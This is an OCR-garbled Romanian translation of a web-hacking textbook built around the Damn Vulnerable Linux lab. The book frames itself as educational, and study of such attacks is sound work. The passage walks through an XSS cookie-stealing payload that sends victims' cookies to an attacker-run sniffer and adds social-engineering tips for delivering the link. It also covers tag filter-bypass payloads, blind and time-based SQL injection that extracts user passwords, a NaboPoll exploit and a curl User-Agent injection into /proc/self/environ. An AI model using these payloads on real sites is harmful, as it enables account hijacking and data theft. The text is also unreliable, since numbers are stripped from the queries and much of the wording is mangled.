> ATAC ȘI APĂRARE Distribuție Linux® al naibii vulnerabile Vask Tgask O distribuție Linux ® studii de caz * capturi de ecran C^PPTER Iuri Jukov BAZELE HACKING WEB » ATAC ȘI Apărare« editia a -a C^PPTER Moscova - Sankt Petersburg - Nijni Novgorod - Voronezh Rostov-pe-Don - Ekaterinburg - Samara - Novosibirsk Kiev - Harkov - Minsk BBC - - UDC J Jukov Yu V J Fundamentals of Web Hacking: Ofense and Defense (+DVD) Ed a -a - Sankt Petersburg: Peter, - p : ill ISBN - - - - A doua ediție a cărții populare a lui Yuri Zhukov este destinată oricărei persoane interesate de hacking și de protecție fiabilă a site-urilor web Sunt descrise vulnerabilitățile reale ale motoarelor de site gratuite utilizate pe scară largă Cartea este însoțită de un DVD-ROM cu un sistem de testare și două distribuții pentru hackeri Linux distribuite gratuit - Damn Vulnerable Linux și Back Track , care rulează pe computerul local al utilizatorului care rulează o mașină virtuală Windows Exemplele de instruire incluse în sistemul de testare sunt analizate în detaliu Informațiile din această carte au doar scop informativ și educațional Editura nu este responsabilă pentru utilizarea ilegală de către cititori a informațiilor primite, care a condus la încălcarea legii BBC - - UDC Toate drepturile rezervate Nicio parte a acestei cărți nu poate fi reprodusă sub nicio formă fără permisiunea scrisă a deținătorilor drepturilor de autor Informațiile conținute în această carte au fost obținute din surse considerate de către editor a fi de încredere Totuși, având în vedere eventualele erori umane sau tehnice, editorul nu poate garanta acuratețea și caracterul complet al informațiilor furnizate și nu este responsabil pentru eventualele erori asociate cu utilizarea cărții ISBN - - - - © LLC Editura „Piter”, Cuprins scurt Introducere Partea I: Noțiuni de bază Despre hacking și hackeri Pregătire nouăsprezece Partea a II-a Elemente de bază ale hackingului web Primul Hack PHP-include Injectare SQL Cross-Site Scripting Injectare SQL oarbă Caracteristici noi ale PHP-Include CRLF-include Partea a III-a Ce urmează? O A Obținerea accesului complet la shell OB Ghicirea parolei de la distanță OC Cracarea parolelor locale DE LA O D Elevarea privilegiului OE Ascunderea urmelor de prezenţă DE Explorarea sistemului Algoritmi pentru preluarea controlului asupra serverului I Exploatările de la distanță Contracararea hackerilor Sarcini reale de securitate IT Anexa Comenzi de bază *pix-comenzi Anexa Injectii SQL in modulul show php al forumului Cyphor Anexa Scăparea parolelor utilizatorilor forumului Cyphor Anexa Utilizarea Exploit-ului de injecție SQL în Forumul Cyphor Anexa Implementarea injectărilor SQL în MS SQL Jet Anexa Textul de exploatare nabopoll php îmbunătățit Anexa Obținerea numelor de tabele și date prin injectare SQL oarbă în MS Access Anexa Resetarea parolei de administrator și ghicirea acesteia în instantCMS Anexa Tehnici rapide de injectare SQL oarbă Anexa Dicţionar hacker Cuprins Introducere Despre ediția a doua Pentru cine este această carte Despre autor unsprezece De la editor PARTEA I PENTRU ÎNCEPERE hacking și hackeri paisprezece Cine sunt hackerii paisprezece De ce hackerii pirata site-urile web Securitatea proprie a hackerului Pregătire nouăsprezece PARTEA II BAZELE HACKINGULUI WEB Primul Hack treizeci PHP-include PHP locală-includere PHP la distanță-Include Un exemplu real de includere PHP - motorul NaboPoll Crearea unui hacker web shell în jurnalele Apache prin local include Locația reală a buștenilor Protecție la pornire de la distanță Protecția împotriva incluziunii locale Injectare SQL Preluarea informaţiilor din baza de date Crearea unui shell web Protecție prin injecție SQL Rezolvarea problemelor de codificare În loc de o postfață la capitolul Cuprins Cross-Site Scripting Domeniul de aplicare al XSS Scripturi pasive Cross-Site Active Cross-Site Scripting Exemplu de widget XSS Vulnerabil Cum ocolesc hackerii mecanismul de filtrare al etichetei , site-ul este vulnerabil la XSS Acest cod va afișa o fereastră în browserul utilizatorului pe care scrie „Hacked by Vasya!” Widget de exemplu vulnerabil la XSS Forumurile sunt cel mai frecvent afectate de acest tip de atac XSS și orice script care utilizează mai multe variabile este vulnerabil și este foarte greu să urmăriți fiecare pentru a vedea dacă este filtrat corect Widget de exemplu vulnerabil la XSS Acum vom crea o mini-aplicație care este vulnerabilă la XSS În editor, creați un fișier name php cu următoarele comenzi: Salvați-l în directorul /usr/local/apache/htdocs În același director, creați un fișier form html cu următorul cod: Formularul va accepta șirul de intrare și la clic pe butonul OK va trece textul acestuia ca parametru (nume) programului name php Deschideți formularul http://localhost/form html în browser (Figura ), introduceți un nume (de exemplu, Vasya) și faceți clic pe butonul OK Orez Formularul de introducere pe care l-am creat form html Modulul name php va afișa numele pe care l-ați introdus, așa cum se arată în fig Acum, dacă deschideți din nou form html și introduceți codul Hacked în loc de nume, cuvântul „Hacked” va fi afișat cu litere mari, așa cum se arată în Fig Fb Cross site scripting Orez § Rezultatul modulului name php este rezultatul numelui de utilizator Orez § Rezultatul modulului name php este că etichetele html nu sunt filtrate Aceasta înseamnă că etichetele html (în cazul nostru, etichetele și , care obligă textul dintre ele să fie tipărit cu litere mari) nu sunt filtrate, ci pur și simplu incluse în textul paginii web generate de modulul nume php Acum, pentru partea distractivă: să încercăm să rulăm un mic script JavaScript în browser Pe pagina form html, în câmpul de introducere, introduceți Aici, etichetele și setează începutul și sfârșitul scriptului (scriptului), iar funcția alert() afișează textul într-o fereastră separată ca avertisment Dacă ați tastat totul fără erori, atunci făcând clic pe butonul OK, veți vedea rezultatul prezentat în Fig Dacă îi dăm victimei un link gata făcut (din câmpul Locație) și victima dă clic pe el, atunci scriptul va fi executat în browserul persoanei care a deschis linkul (și nu pe site) Adică, teoretic, un hacker poate face tot felul de atrocități pe computerul altcuiva, de exemplu, să ruleze anumite programe rău intenționate (În practică, lucrurile nu sunt atât de simple, deoarece pachetele antivirus recunosc și blochează de obicei scripturile rău intenționate ) Cu ajutorul unui script special pregătit, este posibil să „furi” cookie-urile victimei de pe computerul victimei Vedem conținutul cookie-ului doar prin introducerea scriptului a ert(document cook e) Widget de exemplu vulnerabil la XSS Orez Executarea scriptului hackerului în browserul victimei Și dacă ați vizitat site-uri folosind cookie-uri de la Damn Vulnerable Linux, veți vedea ceva ca cel prezentat în fig Orez Vizualizarea conținutului cookie-urilor În realitate, desigur, hackerul nu trebuie să arate utilizatorului conținutul fișierului cookie, ci să îl transmită în liniște computerului său Acum vom încerca să scriem un cod JavaScript care, atunci când este inserat în formularul aplicației noastre, trimite cookie-urile victimei unui script php hacker (numit php sniffer), care, la rândul său, le salvează într-un fișier text pe site-ul hackerului Server Deși acum puteți folosi un sniffer online gata făcut, vom scrie propriul nostru sniffer php și îl vom folosi pentru a fura cookie-uri Nu este nevoie să tastați comentarii (în orice caz, limba rusă nu este acceptată în DVL), acestea sunt inserate aici pur și simplu pentru a explica cum funcționează programul document os op ger ase('http://vdsh sdit/your sniffer php?com='+document cookie); Să analizăm eșantionul mai detaliat: Despre document location replace - redirecționarea cookie-urilor furate către sniffer-ul nostru o' http://yoursitep/your sniffer php este adresa sniffer-ului nostru Despre ?com=' +document cookie-uri e - pare să atribuie sute de fișiere cookie furate unei variabile, dar de fapt nu există o astfel de variabilă în scriptul sniffer și scrie întreaga linie după ? (din variabila QUERY STRING), astfel încât fiecare fragment de cookie trimis nouă și salvat într-un fișier va începe cu caracterele honeycomb = Dacă doriți să utilizați cookie-uri direct în browser, nu uitați să eliminați aceste caractere suplimentare După executarea acestui script, cookie-urile vor fi trimise la serverul dvs web și scrise în fișierul cookies txt În cazul nostru, introducem următoarea linie în câmpul formular form html: document ocat on replace('http:// oca host/stea php?com='+document cookie); După ce faceți clic pe butonul OK, scriptul nostru va funcționa pentru utilizator, iar steaLphp sniffer-ul va fi executat pe serverul nostru Apoi, accesați directorul /tmp și utilizați comanda cat cookie es txt afișăm conținutul fișierului cookie txt cu cookie-uri (Fig ) În viața reală, hackerul va converti cererea noastră în valori hexazecimale sau în codificare base , astfel încât victima să nu suspecteze nimic După aceea, hackerul poate „împinge” link-ul către victimă Și aceasta este o chestiune de inginerie socială Widget de exemplu vulnerabil la XSS Puteți spune obiectului că scenariul ridică ratingul în rețelele de socializare, vă permite să scrieți mesaje private unor celebrități pe care o adora etc În plus, se presupune că victima face clic pe link și fișierele cookie ale victimei sunt scrise în fișierul cookie txt Puteți încerca să le decriptați (de exemplu, în serviciul online de decriptare hash-uri mdS, despre care am scris în capitolul , sau folosind unul dintre programele descrise în capitolul OS) Sau puteți folosi cookie-uri în forma lor originală, în loc de „IE donkey” (adică Internet Explorer) folosind Opera sau FireFox Desigur, v-am spus toate acestea pentru a vă familiariza și a proteja împotriva unor astfel de manipulări ale hackerilor, și nu pentru aplicare practică Acum mi-am amintit (și am zâmbit) cu câți ani în urmă m-am distrat în chat-ul „Pătuț”, inserând un apel către scripturi standard de chat în mesajele mele (le-am aflat numele doar studiind textul sursă al paginii html) La acel moment, în „Pătuț” modul de a permite sau interzice parțial sau complet etichetele a fost ales de către utilizator însuși Drept urmare, toți cei care aveau etichete permise, au primit, din mila mea, de exemplu, invitații la privat de la niște chatter populare, care, desigur, nu au trimis de fapt nicio invitație Trimițând simultan invitații unul în numele celuilalt tipului și fetei pe care i-am ales, păream să fiu implicat în „proxenetism” virtual și adesea cei (puțin perplexi cu privire la cine a invitat pe cine) s-au retras cu adevărat în privat Și când o fată din chatul general s-a plâns că nimeni nu vrea să comunice cu ea, am făcut imediat așa încât să fie invitată simultan (se presupune) la privat de către toți cei prezenți cărora li sa permis să execute scripturi (și erau mai mult de un zeci dintre ele) Asta a făcut-o fericită! © Acesta este un simț al umorului atât de ciudat pe care unii administratori de securitate informatică îl au Desigur, acum autorul nu ar repeta niciodată astfel de farse, iar etichetele html din chat-uri au fost de mult filtrate peste tot După cum puteți vedea, exemplul nostru vulnerabil de mini-aplicație este scriptarea pasivă între site-uri, în timp ce exemplul de chat Crib este activ Folosind XSS, puteți consulta și codul html sursă al paginii Pentru aceasta este folosită următoarea funcție: funcția ShowPage(){ // Am pus toate proprietățile etichetei în variabilă var page=document getElementBylcK "html"); // și acum punem codul paginii în variabila CodeOfPage var CodeOfPage=page innerHTML; // afișează codul paginii apelând alertО și Iert(CodeOfPage): } Când introduceți acest lucru în browser, eliminați comentariile care încep cu // și scrieți totul pe o singură linie Scripturi între site-uri Cum ocolesc hackerii mecanismul de filtrare al etichetei Ce ar trebui să facă un hacker dacă eticheta este filtrată? Mulți programatori se tem de eticheta și, prin urmare, o filtrează Dar, chiar dacă este filtrat, există încă multe etichete prin care poate trece scriptul XSS Acestea sunt etichetele în care este permisă opțiunea javascript (sau vbscript) Din motive de concizie, ne vom uita doar la ieșirea alertei (alertei), deși, de fapt, orice script poate fi inclus în pagină Toate etichetele care pot fi utilizate pentru scripturi între site-uri sunt împărțite în două grupuri: O etichete care funcționează bine în toate browserele; Despre etichetele care funcționează numai în Internet Explorer Să ne uităm mai întâi la etichetele care sunt gestionate de toate browserele Despre Servește pentru indexarea paginii de către motoarele de căutare, dar nu de asta avem nevoie Eticheta are o proprietate refresh, unde puteți specifica cod arbitrar în parametrul CONTENT: Despre Aceasta este eticheta binecunoscută: Are o proprietate OnLoad care este executată atunci când pagina este încărcată Puteți introduce cod JavaScript în această proprietate astfel: Despre Pentru scripturi încrucișate, proprietatea SRC poate fi utilizată: Dar ce se întâmplă dacă cuvântul javascript este filtrat? Puteți încerca să ocoliți filtrarea în felul următor: Iată mai multe opțiuni: De asemenea, puteți utiliza limbajul VBScript: O Cum ocolesc hackerii mecanismul de filtrare al etichetei Acum să ne uităm la etichetele care funcționează corect numai în Internet Explorer Despre Această etichetă este folosită pentru a crea tabele Are o proprietate BACKGROUND, care este responsabilă pentru fundalul tabelului Pericolul acestei etichete este că puteți introduce cod JavaScript în loc de fundal: O Această etichetă servește drept container pentru text Textul inclus în etichetele și poate fi stilizat Iată un exemplu: Există o altă opțiune, în care în loc de uri () este folosită funcția expres-slonO: O și Iată primul caz de utilizare: Aici, clasa XSS este mai întâi declarată (codul XSS este localizat în ea), apoi este apelată folosind codul A doua varianta: În această opțiune, codul nostru XSS este specificat ca imagine de fundal a paginii Despre Această etichetă vă permite să setați sunetul de fundal al paginii, dar puteți specifica codul JavaScript în locul fișierului de sunet: O Această etichetă este folosită pentru a insera imagini într-o pagină Există două proprietăți ale acestei etichete care sunt gestionate numai de Internet Explorer Acestea sunt proprietățile DYNSRC și LOWSRC Valoarea lor poate conține codul de script: În același mod, puteți specifica codul în proprietatea SRC pentru orice browser, așa cum am descris mai devreme Despre Această etichetă încorporează un anumit obiect într-o pagină html Inserarea codului JavaScript la distanță este posibilă în felul următor: OBJECT TYPE="text/x-scr ptlet" DATE= „http://www site com/test html"> Scripturi între site-uri Aici am indicat adresa paginii unde poate fi localizat codul periculos Această etichetă poate fi folosită pentru a infecta mai mulți clienți Un atacator poate introduce cu ușurință un link către pagina sa cu codul troian Când se deschide o pagină vulnerabilă, codul troian va fi descărcat de pe alt site Acest lucru face mai ușor atunci când utilizați XSS să încercați să infectați utilizatorii mai multor site-uri În cele din urmă, iată câteva motive posibile pentru care XSS nu funcționează: A Codul JavaScript al clientului poate fi blocat de browser sau firewall Un cod VBScript poate fi blocat pe client A Clientul poate fi blocat de obiecte externe (ceea ce împiedică încărcarea scripturilor de pe alt site) Scripturile XSS cu eticheta nu funcționează în browserul FireFox SFAT - - Există și alte tutoriale în DVL, inclusiv unul despre XSS Le puteți găsi prin browser la http://localhost/webexploitation package / Tratează-le ca pe niște simple exerciții suplimentare după tot ce ai învățat în acest capitol Blind SQL Injection Vom lua în considerare injectarea SQL oarbă folosind SGBD-ul MySQL ca exemplu, deși aceeași idee funcționează în MS SQL și în alte SGBD Cu injecția oarbă, nu vedeți datele care sunt preluate, ci doar răspunsul serverului În comparație cu injecția obișnuită, injectarea oarbă este puțin mai complexă și mai consumatoare de timp de implementat, dar dacă există mai multe clauze SELECT în injecție și cuvântul cheie UNION nu poate fi folosit, atunci injectarea oarbă este optimă pentru un hacker Mai întâi, să vedem cum puteți „trage” versiunea MySQL, cum să ghiciți numele tabelelor și coloanelor și cum să extrageți apoi date din coloanele bazei de date Ca și până acum, vom încerca să ne punem în locul unui hacker Nu încercați să utilizați un comentariu (adică caractere sau /*) când faceți o injecție oarbă, de obicei este inutil și poate doar să încurce lucrurile Dacă folosiți un comentariu, ca în cazul instrucțiunii INSERT (vezi mai jos), trebuie să aveți grijă ca alte valori să fie scrise în bază în loc de valorile comentate Există instrumente pentru automatizarea injecțiilor oarbe, dar este mai bine să știți cum funcționează o astfel de injecție și să o puteți implementa manual În plus, este adesea mai convenabil să faceți manual partea inițială a lucrării și apoi să utilizați un instrument automat pentru a extrage conținutul din coloană Extragerea orbește a datelor este lentă și laborioasă chiar și atunci când este automatizată, dar atunci când nu există alte opțiuni disponibile, este cea mai bună metodă pentru hacking site-uri Vom folosi o adresă inexistentă în exemplu http://site com/news php? d= Să presupunem că atunci când încercăm să mergem la această adresă, vedem un articol de știri cu titlu și conținut Pentru a verifica posibilitatea injectării oarbe, se introduc următoarele: news php?id= și = Blind SQL Injection În acest caz, ar trebui să vedem aceeași pagină ca înainte Să încercăm asta în continuare: news php?id= și = În cazul unei injecții reușite, veți vedea că o parte din conținut se va pierde Acest lucru poate fi observat imediat, de exemplu, dacă textul articolului nu este afișat, sau poate fi mai puțin vizibil, de exemplu, dacă doar titlul dispare sau numărul de pagini din articol scade Puteți face clic pe butoanele Înapoi și Înainte din browser pentru a vedea diferențele Dacă injecția noastră este efectuată cu o variabilă șir, în locul celor anterioare, trebuie să folosim următoarele linii: news php? d= ' și l='l news php? d= ' și =' Aceasta va elimina eroarea de sintaxă Pentru cazul nostru, să presupunem că titlul sau conținutul articolului dispare atunci când introducem caracterele = , iar nimic nu dispare când introducem caracterele = Adică, condiția pe care o introducem afectează datele returnate Dacă condiția este adevărată, datele sunt returnate (ca în cazul lui = ), iar dacă este falsă, nu sunt returnate date (ca în cazul lui = ) Așa că vom stabili condiții care sunt fie adevărate, fie false și putem afla că sunt adevărate returnând conținutul paginii sau că sunt false prin nereturnare Vom spune că „pagina s-a încărcat normal” la primirea datelor din baza de date Obținerea numărului versiunii MySQL folosind variabila @@version Mai întâi trebuie să aflați numărul versiunii MySQL Acest lucru vă va ajuta să cunoașteți comenzile disponibile, deoarece versiunile MySQL diferă Solicitarea ar trebui să arate astfel: news php?id= și substring(@@version,l,l)= Aceasta preia primul caracter din variabila @@version și verifică egalitatea la patru (= ) Dacă această egalitate este adevărată, vom vedea un articol de știri, în caz contrar vom vedea o pagină incompletă, așa cum a fost cazul în = Deoarece nu există suficient conținut în pagină, schimbăm cu și încercăm din nou Dacă de data aceasta pagina se încarcă normal, atunci avem de-a face cu MySQL Dacă și nu funcționează, încercați Dacă se dovedește a fi o versiune a MySQL , va fi aproape imposibil să obțineți date, deoarece subinterogările SELECT și operatorul UNION nu sunt permise în această versiune NOTĂ - În loc de variabila @@version, puteți încerca să apelați funcția version() Ghicirea numelor coloanelor din tabelul găsit Verificarea capacității de a accesa tabelul mysql user Următorul lucru pe care îl facem este să verificăm dacă o subinterogare poate fi utilizată, deoarece uneori cuvântul cheie select este pe lista neagră: news php?id= și (select )= Dacă această subcerere reușește, ar trebui să vedeți că pagina se încarcă normal În continuare, să vedem dacă avem suficient de privilegiați pentru a avea acces la tabelul mysql utilizator: news php?id= și (SELECT din limita mysql user )=l Dacă avem acces la tabelul mysql utilizator, interogarea va returna valoarea , dacă nu, va apărea o eroare și nu va fi returnat nimic Deci, dacă pagina se încarcă bine, înseamnă că avem acces la mysql utilizator și puteți încerca ulterior să extrageți hash-urile parolei MySQL sau să utilizați funcțiile load fi e() și OUTFILE Rețineți că am limitat numărul de înregistrări returnate cu constructul limit , deoarece subinterogările pot returna doar o înregistrare de date; altfel vor arunca o eroare și vor eșua Prin urmare, asigurați-vă că includeți cuvântul cheie limită Ghicirea numelor de tabel În exemplul nostru, avem de-a face cu versiunea MySQL , totuși, extragerea datelor din baza de date a schemei de informații în timpul unui atac orb este foarte lentă, așa că uneori are sens să încercăm doar să ghicim numele unor tabele De exemplu, următoarea interogare încearcă să recupereze date din tabelul utilizatori: news php?id= și (SELECT din limita utilizatorilor ,l)=l Dacă există un tabel numit utilizatori în baza de date, pagina se va încărca normal În continuare, trebuie doar să schimbați numele tabelului, încercând să-l ghiciți Dacă rulați MySQL , va trebui să ghiciți numele tabelelor și coloanelor Ghicirea numelor coloanelor în tabelul găsit Dacă aveți noroc și ați ghicit numele corecte ale oricăror tabele, puteți încerca să ghiciți numele coloanelor din aceste tabele Să presupunem că tabelul utilizatorilor § Blind SQL Injection în exemplul nostru este deja găsit, atunci puteți încerca să executați următoarea interogare: news php?id= și (SELECT substring( concat(l,parola),l,l) de la utilizatorii Urnit ,l)=l Aici am adăugat conținutul coloanei de parolă la șirul „ ”, apoi am numit funcția subșir (selectarea unei părți a șirului), luând doar primul caracter, care ar trebui să fie egal cu dacă coloana de parolă există Apoi, schimbați doar parola numelui pentru a încerca să ghiciți numele coloanelor Extragerea datelor din tabelele/coloanele găsite Deoarece preluarea datelor din tabele poate consuma mult timp, este util să folosiți automatizarea aici, dar știind cum să o faceți manual vă va ajuta să înțelegeți mai bine mecanismul injectării oarbe SQL Vom prelua numele de utilizator (nume de utilizator) și parola (parola) din tabelul utilizatori Să presupunem că am aflat mai devreme că într-un tabel există coloane nume de utilizator, parolă, e-mail și ID de utilizator Acum să încercăm să extragem numele (nume de utilizator) și parola (parola) unui anumit utilizator folosind clauza where: news php?id= și ascii(substring((SELECT concat( username x a,parola) de la utilizatorii unde userid= ),ll))> De asemenea, puteți încerca să utilizați constrângerea imit pentru a prelua datele primului utilizator, deoarece subinterogările trebuie să returneze doar o înregistrare, altfel va apărea o eroare Aceasta nu este o idee rea dacă nu știți câte înregistrări va returna interogarea În plus, subinterogarea noastră selectă este încapsulată într-un apel la funcția substring( ), care trunchiază datele returnate la primul caracter Funcția ascii() convertește apoi acel singur caracter în codul său numeric ASCII, care este apoi testat pentru > Deci, dacă în exemplul dat codul ASCII al acestui caracter este mai mare de , atunci pagina se va încărca normal Dacă în cazul nostru pagina nu se încarcă complet, aceasta va însemna că codul primului caracter este mai mic de și este necesară o nouă verificare: news php?id= și ascii(substring((SELECT concat( username x a parola) de la utilizatorii unde userid= ) ll))> Dacă pagina se încarcă normal, atunci codul caracterului este mai mare de În continuare, încercăm valori mai mari: news php?id= și ascii(substring((SELECT concat( username x a password) de la utilizatorii unde userid= ),l,l))> Dacă nu funcționează, încercați o valoare mai mică: news php?id= și ascii(substring((SELECT concat( username x a password) de la utilizatorii unde userid= ), ))> Extragerea datelor din tabelele/coloanele găsite Dacă funcționează, crește valoarea: news php?id- și ascii(substring((SELECT concat( username, x a,parola) de la utilizatorii unde userid= ), , ))> Dacă de data aceasta nu funcționează din nou, atunci totul este simplu Acum avem un număr mai mare de , dar nu mai mare de , adică acest număr este ! Pentru a verifica acest lucru, puteți verifica condiția = Apoi, folosind convertorul ASCII (funcția char( )), aflăm că prima literă a rezultatului returnat de la bază este V SFAT - Pentru a recunoaște un caracter după codul său ASCII, nu este necesar să folosiți funcția char() În consola Linux, puteți lansa comanda man ascii și va afișa întregul tabel de simboluri și codurile acestora pe ecran Pentru a obține următorul caracter, modificăm funcția subșir: news php?id= și ascii(substring((SELECT concat( nume de utilizator, x a, parola) de la utilizatorii unde userid= ), ,l))> Am înlocuit caracterele , , cu , în apelul funcției subșir, astfel încât să returneze al doilea caracter din rezultatul interogării select Apoi se repetă aceeași procedură ca și pentru primul caracter Fie ca condiția > să fie adevărată de data aceasta, deci crește numărul: news php?id= și ascii(substring((SELECT concat(nume utilizator, x a,parolă) de la utilizatorii unde userid= ), ,l))> Dacă nu, reduceți-l la : news php?id= și ascii(substring((SELECT concat(nume utilizator, x a,parolă) de la utilizatorii unde userid= ), ,l))> Dacă nu din nou, îl facem și mai mic: news php?id= și ascii(substring((SELECT concat(nume utilizator, x a,parolă) de la utilizatorii unde userid= ), ,l))> Și cu atât mai puțin: news php?id= și ascii(substring((SELECT concat(nume utilizator, x a,parolă) de la utilizatorii unde userid= ), ,l))> Condiția să fie adevărată de data aceasta Apoi creștem numărul: news php?id= și ascii(substring((SELECT concat(nume utilizator, x a,parolă) de la utilizatorii unde userid= ), ,l))> Dacă condiția este adevărată, înseamnă că numărul este mai mare decât și nu mai mare de , adică numărul dorit este Apelând char( ) se obține litera i Deci deocamdată avem sintagma VI După cum ați observat, în interogări la baza de date, am învățat doar două caractere Și încă am fost norocoși când am ghicit Ei bine, atunci într-un mod similar (folosind funcția subșir) următorul caracter este ghicit, până când, în final, condiția > devine falsă Sper că înțelegeți acum că extragerea perechilor utilizator/parolă poate consuma destul de mult timp Blind SQL Injection Injecție oarbă SQL în motorul NaboPoll Există o vulnerabilitate Blind SQL Injection în motorul NaboPoll (proiectat pentru polling) instalat pe Damn Vulnerable Linux, și mai precis în modulul results php Textul vulnerabil este: Rândurile $res question = mysql query("selectați * din nabopoll questions unde sondaj=$survey order by id"); if ($res question == FALSE || mysql numrows($res question) == ) eroare($row survey, „întrebări nu au fost găsite”); Parametrul Ssurvey (sondaj) nu este filtrat în prealabil, ci este înlocuit direct în interogarea SQL Aceasta este o injecție oarbă, deoarece parametrul în sine este utilizat numai în clauza where și nu este afișat în continuare în browser Acum să aruncăm o privire la exploatarea vulnerabilității Primul pas este să mergeți la directorul de administrare a site-ului la http://localhost/webexploitation package /nabopoll/admin/survey edit php și să creați un nou sondaj, așa cum se arată în Figura Orez Crearea unui sondaj nou în NaboPoll Solicitarea este adăugată făcând clic pe pictograma albastră plus și salvată făcând clic pe pictograma verde de bifă din secțiunea Acțiuni Pentru a coborî un nivel pentru a adăuga întrebări (și apoi răspunsuri), trebuie să faceți clic pe pictograma săgeată violet (este ultima pictogramă din secțiunea Acțiuni) Dacă ați făcut totul corect, atunci rezultatul sondajului numărul va arăta ceva ca cel prezentat în Fig (accesați http://localhost/webexpLoitation package /nabopoll/result php?surv=l) Injecție oarbă SQL în motorul NaboPoll Orez Sondajul NaboPoll pe care l-am creat Acum adăugați următorul text după constructul surv=l: /**/AND/**/l=(SELECT/**/(IF ((ASCII(SUBSTRING(user() ))> ), ))) Am găsit un text similar într-un exploit gata făcut pentru injectarea SQL în motorul NaboPoll Să o analizăm mai detaliat Comentariile goale (/**/) sunt folosite în loc de spații, probabil site-ul nu recunoaște spații Condiția noastră AND = este adăugată la instrucțiunea SELECT care există undeva în măruntaiele paginii, iar subinterogarea SELECT cu instrucțiunea IF condiționată este în dreapta între paranteze Instrucțiunea IF, în funcție de adevărul condiției, va returna fie primul argument ( ) dacă condiția este adevărată, fie al doilea ( ) dacă este falsă Astfel, dacă condiția din IF este adevărată, vom obține AND = și interogarea principală către baza de date va fi executată normal (vom vedea pagina cu rezultatul sondajului) Dacă condiția este falsă, atunci vom obține AND = și interogarea principală nu va returna nimic, iar pe pagină va apărea mesajul sondaj negăsit Condiția de a verifica în instrucțiunea IF este: Codul ASCII al primului caracter al numelui de utilizator MySQL (returnat de funcția utilizator) este mai mare decât (sau mai mic decât) o anumită valoare Am verificat mai întâi dacă acest cod este mai mare decât , dar serverul nu a afișat pagina de sondaj (Fig ), ceea ce înseamnă că condiția este falsă În continuare, verificăm, de exemplu, dacă acest cod este mai mare de și, ca urmare, serverul returnează un răspuns pozitiv (pagina cu sondajul s-a încărcat) Încercând de mai multe ori, aflăm că codul pentru primul caracter este Acesta este codul pentru litera r Blind SQL Injection http ^ocalhosUwebexploit tionj>ackageJ)?/nabopoll/re$ultphp Konqtieror • • x tocation £dit Vizualizare fio ftookmarks Jools Setări y^indow Nave ▼ v Lfication >oll/result php'surv"l/**/AND/**/l"(SELECT/^/(IF((ASCII(SUBSTRING(useșr(),ll))> bl O^] ▼ J ; sondajul nu a fost găsit Orez Injectare oarbă în NaboPoll În mod similar, se caută codul celui de-al doilea caracter (înlocuim al doilea parametru din apelul SUBSTRING cu ): /**/ȘI/**/l=(SELECT/**/(IF((ASCII(SUBSTRING(user(), ,l))> ),l, ))) După un număr mic de încercări, constatăm că codul celui de-al doilea caracter este (litera o) Orez Exploat text pentru NaboPoll Injecție oarbă SQL în motorul NaboPoll Pentru a nu pierde timpul cu enumerarea manuală a caracterelor, accesați http://pack-etstormsecurity org/ -exploits/nabopoll-sqLtxt și copiați textul exploit-ului în editor Tot ce este înainte de începerea programului (înainte de operatorul , benchmark( md (now())) ) 'hacked') /*]', 'xxx'); Aici, rezultatul executării operatorului condiționat f este verificat pentru egalitatea cu unu, care, așa cum am indicat, dacă condiția este adevărată, va executa funcția de referință, dacă este falsă, va returna pur și simplu valoarea - În condiția în sine, subinterogarea selectează un nume de utilizator din tabelul mysql user, ia primul caracter din acesta, îl convertește în litere mici și verifică dacă codul său ASCII este mai mare decât Deoarece este probabil mai mare, funcția de benchmark va fi executat, iar temporar £i întârzierea va fi de câteva secunde (funcția de referință calculează MD -xain de la ora curentă de de ori) Nu vom scrie valoarea xxx în tabel, deoarece este precedată de caractere de comentariu (/*), în schimb se va scrie cuvântul hacked Dar această instrucțiune va fi executată fără întârziere, deoarece codul de caractere nu poate depăși : INSERT INTO table VALUES ('aaa', 'bbb' '[ ' SAU l=if(asc (lower(substring(( selectați utilizatorul din mysql user Urnit ), )> , benchmark( ,md (acum())), ) ) 'hacked') /*]', 'xxx'): Dacă căutarea este efectuată prin verificarea caracterului pentru egalitate, o întârziere ar trebui stabilită exact în cazul în care condiția este adevărată Deoarece rezultatul negativ al comparației este mult mai frecvent, iterația va fi mai rapidă Când se utilizează întârzieri de timp, nu are sens să se folosească metoda semidiviziunii, deoarece în această metodă, rezultatele negative și pozitive ale comparației sunt la fel de probabile și, prin urmare, întârzierea BpeMeHHăn va funcționa de multe ori Când implementați un exploit folosind funcția de benchmark, trebuie luate în considerare următoarele puncte: A Apelarea funcției de referință pune o sarcină grea CPU-ului serverului Administratorul poate observa întârzieri în lucru A Timpul de exploatare este direct proporțional cu lungimea înregistrării preluate Este nevoie de mai mult de o oră pentru a selecta un hash de de caractere A Atacatorul are nevoie de acces la internet de mare viteză Blind SQL Injection A Numărul de execuții ale funcției de testare de referință (în cazul nostru ) depinde de performanța serverului Este recomandabil să efectuați mai întâi reglarea automată a acestui parametru în exploit A După fiecare apel la funcția de referință, sistemul trebuie să primească o pauză egală cu sau la sută din durata execuției funcției în sine În caz contrar, următoarea cerere va avea un timp de execuție imprevizibil, iar caracterele ulterioare nu vor fi procesate corect fl Caracteristici noi ale PHP-Include Injectare în fișierul /proc/self/environ Să presupunem că pe un anumit site (http://site com) există un cod php care este vulnerabil la includerea locală Să presupunem, de asemenea, că nu avem posibilitatea de a încărca un fișier/imagine cu un shell, nu am găsit calea către jurnalele serverului Apache și datele sesiunii nu sunt salvate în directorul /tmp Ce sa fac? Un hacker fără experiență în incluziunea locală ar renunța Cel sofisticat folosește depozitul de variabile de mediu /proc/self/environ Când solicităm orice pagină php de pe server, este creat un nou proces Pe sistemele pix, fiecare proces are propria sa intrare în directorul /proc, iar /proc/seif este o cale statică și o legătură simbolică care conține informații utile pentru procesele recente Dacă scrieți un shell web în /proc/self/environ, veți putea executa comenzi de sistem arbitrare În același mod în care am injectat jurnalele Apache, putem include și codul în /proc/self/environ De exemplu, să luăm câmpul user-agent (numele browserului web) În mod implicit, partea din /proc/self/environ care arată user-agent arată cam așa: PATH=/sb n:/usr/sb n:/bin:/usr/b n:/usr/XllR /b n:/usr/b n:/b n SERVER ADMIN=adm n@s te corn Mozilla/ (Windows; U; Windows NT ; en-US; rv: ) Gecko/ F refox/ HTTP KEEP ALIVE= Și acum în loc de user-agent înlocuim și accesați scriptul nostru vulnerabil cu comanda cu r : Cur! „http;//s te com/ ndex php?page= /rgos/se f/env ron&cmd=php nfo();” -N „Agent utilizator: " Funcția phpinfo() va reuși În acest caz, partea /proc/self/environ cu codul de hacker user-agent va arăta astfel: PATH=/sb n:/usr/sb n:/b n:/usr/b n:/usr/XllR /b n:/usr/b 